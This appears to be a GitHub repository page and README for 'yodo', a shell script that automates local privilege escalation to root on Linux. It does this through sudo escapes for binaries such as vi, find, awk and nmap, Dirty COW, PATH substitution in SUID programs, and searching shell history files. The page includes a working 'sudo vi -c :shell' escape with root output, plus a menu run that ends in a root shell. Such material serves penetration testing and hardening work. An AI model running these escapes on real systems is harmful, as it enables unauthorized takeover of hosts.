Local Privilege Escalation
Shell
Latest commit 54e3dad Dec 2, 2016 @b3rito committed on GitHub file > /tmp/file
Permalink
Failed to load latest commit information.
LICENSE Initial commit Nov 13, 2016
README.md update Nov 29, 2016
yodo.sh file > /tmp/file Dec 2, 2016

README.md

yodo

This tool proves how easy it is to become root via limited sudo permissions, via dirty COW or using Pa(th)zuzu.

dirty COW : exploits a race condition in the implementation of the copy-on-write mechanism Link : https://dirtycow.ninja

Pa(th)zuzu : Checks for PATH substitution vulnerabilities, logs the commands executed by the vulnerable executables and injects commands with the permissions of the owner of the process (SUID) Link : https://github.com/ShotokanZH/Pa-th-zuzu

Extra features

VSP : checks if the user is able to overwrite a sudo-enabled command with his own

History : checks for * history (like bash_history) files. You could be lucky!

b3 : tries to substitute commands that has root privileges [sudo -l >>> User may run the following commands ... (root) NOPASSWD: /path/to/script]

Example: If a user has sudo privileges only on vi, he could become root by runnuing this command: sudo vi -c ':shell'

b3rito@victim ~/Desktop $ sudo vi -c ':shell'
[sudo] password for b3rito:
victim Desktop # whoami
root

Author

Written by b3rito at mes3hacklab

Installation

chmod +x yodo.sh

Usage

./yodo.sh

b3rito@victim ~/Desktop $ ./yodo.sh
=======================================================================                                                       
                                ....                         
                            ..  .77.                        
                            Z.  ,77?                        
                           .Z$.....,?+?.       
                   ....     $?Z.77+??I..            
                   .7I.  .....~.77:=I..Z.....      
                   .77?  ..7?.?.=7....ZO..~..            
               ..  ..7$7.=7I$.??+.$$~.==.??..    .~..  
              .$Z$..Z...77.$7..+=?,.I?=.++.+~....?7... ..  
               ..?.I7:..77....$$IO++??=...7$.Z$..7$?..7$  
               .77.+:$?7..Z$.?,.~M,?,..77. .ZZ...,,.$77.. 
          ..$=. +7$7...77+$I? ???M.$.I:~I?..,$..7$.Z7=.   
          ..Z7Z.=..~,.....,=O...~MI=~=...O$.~...?7..:$7I. 
          ...Z.Z.?I?.=:.??...??..M.ZZ.. ,.~Z$I,.,7...I.,....   
          ..,......:.~~.?.?+..?~7M..,?...==.~7..:.Z$+.. ....
            .?7..??,...Z.=?:.I7..M. D$Z?$+=.:... +Z+,....77.....
      .$~...:+O7$.+I+$=~:.=...7,:M.M~7 ..Z$..+~:?...7?$.?$~.OZZ$Z...
      ..$I7=?I?,..7?$$M..=:..?...MM.7$,.7...:??....,7I...?..Z$Z$$$.
      ...,=~.?.+.7.....8.$...?,+~MD+I...$7.I.O$Z$.. D8..I=$:$,....
        .$~+$....7Z.$$$7M.?+=$..,M8 .Z.I., M,ZZZ.MM..7+?+77..7..
          .. ...$.MM.....MZ$~Z:Z,MM.O$,$7,MZ .NMM.~77.+?+.7...
             I7~Z....MM .M7Z....?MMO,Z..$.M 8MM ..=77I=~?..I~.
        .$7I7?.+...$...:MMM. .$=OMM?Z,,..MMMMMMMMMMMMMI..=Z$+...
        ..?7I$$I.+.O:Z,=.8MN.$??MMM..$7.MMM...Z.$.+,?.Z.Z=..$77$..
               ...?OMMMMMMDMM7$IMMM ..MMM..,$7.Z$Z..??I$,Z.?I...
               7?:++.??=...~8D..MMM MMMM.???.$...~$.....$Z..7$.. 
               .....??,::Z$::MM.MMMMMM,,=II?II,.....   ...... ..
                    ,...?:...IOOO8OO8 ?I,:        ,.     
                        .     88OOOO. :.                 
                       .:,,,:,.8OOOO :.                  
                       .,....,. OO8M:.. :.               
                        ..... . 8OMN.:.                  
                               .ONM8::.                  
                :8MDO  8MDO   :8MDO,    DMO8M       :8MDO, 
                  DMO  DMO  .+8D   MO,  DMO  8M   .+8D   MO,
                    O  O    $O     OMM  DMO   8M  $O     OMM 
                  :8MDO    .OO     O8   DMO  8M  .OO     O8M,
                  DMO         .8°O88    DMO8M       .8°O88
                              .8OOOO. .           :.       
                   ...         OOOOO,.                       
    ..  . ......    .........,.MMMMMMI.,........... .       
      .     .. ,INMMMMMMMMMMMMMMMMMMIZMMMMMMMN7=..... . . .  ..
             .  =. ......~?ZMMMIM.MM NMMN...   .......=+ . .  
             .  .. .  .$...MM,.MM ..MD....MMMMO... .. ..,..~ 
             ,     .   . :MM.  MM  .ZMM?.. .$M...7MD77ZD+.,. 
          .    .  :=D7Z8MM.   .M:   .. .MD.. .7D~. ..,.O. .. 
          .. $..=.    ?M?. .. .M.  ..M...IMM  .,..M ..   ..:.. 
          . ..... . .MM.Z   D ,M+. . :+..M. N+ . . ..? . .... 
                   .M7=.+.=.~.:MM.    .  , . .M..   .  ,.  
                  .N?.8. ~  ..,M 8. ... . M. . M.      . . .  
              . ..NM .$..    .MM...  .    ,+.:: 8 .         
             . =M.M ..?..    ..M  M .   . .M .I,.M.       
        ,~~  .   .I...8..    M M  .8,.     Z.... b3    
           .     +.   +. .. : .M....O.    ...  . D.=.   
                 O.  .~,    $. 8     .    .~.  ..+ .   
                 8.   ...   M. ,..   , +   .I.. .,..7  
                 O.    .    I   I     ..  .   .  .... 
                 +.      .  :  .M.                   
                  .         .   M                  
                 ..         .   ..                
                 .          .                    
                  ~.             N.                                         
=======================================================================
Possible options (‡ excluded):
 [·] find
 [·] vi
 [·] b3

 Select From the menu:

   1) Find                8) Man  *               17) Pathzuzu °‡
   2) AWK                10) Dirty COW °‡         18) History °‡
   3) Nmap               11) Gdb                  19) Vim
   4) Vi                 12) Ruby                 20) Lua
   5) Python             13) b3                   21) Ftp *
   6) Irb                14) Perl                 22) Credits
   7) Less *             15) Tee                  23) Update
   8) More *             16) VSP °‡               99) Exit

 VSP = Vulnerable Script Permissions
 Pathzuzu = SUID exploitation through Path vulnerability
 b3 = editable root privileged commands listed in 'sudo -l'
 * user interatcion
 ° sudo not required
Enter Number: 1
[sudo] password for b3rito:
victim Desktop # whoami
root
victim Desktop #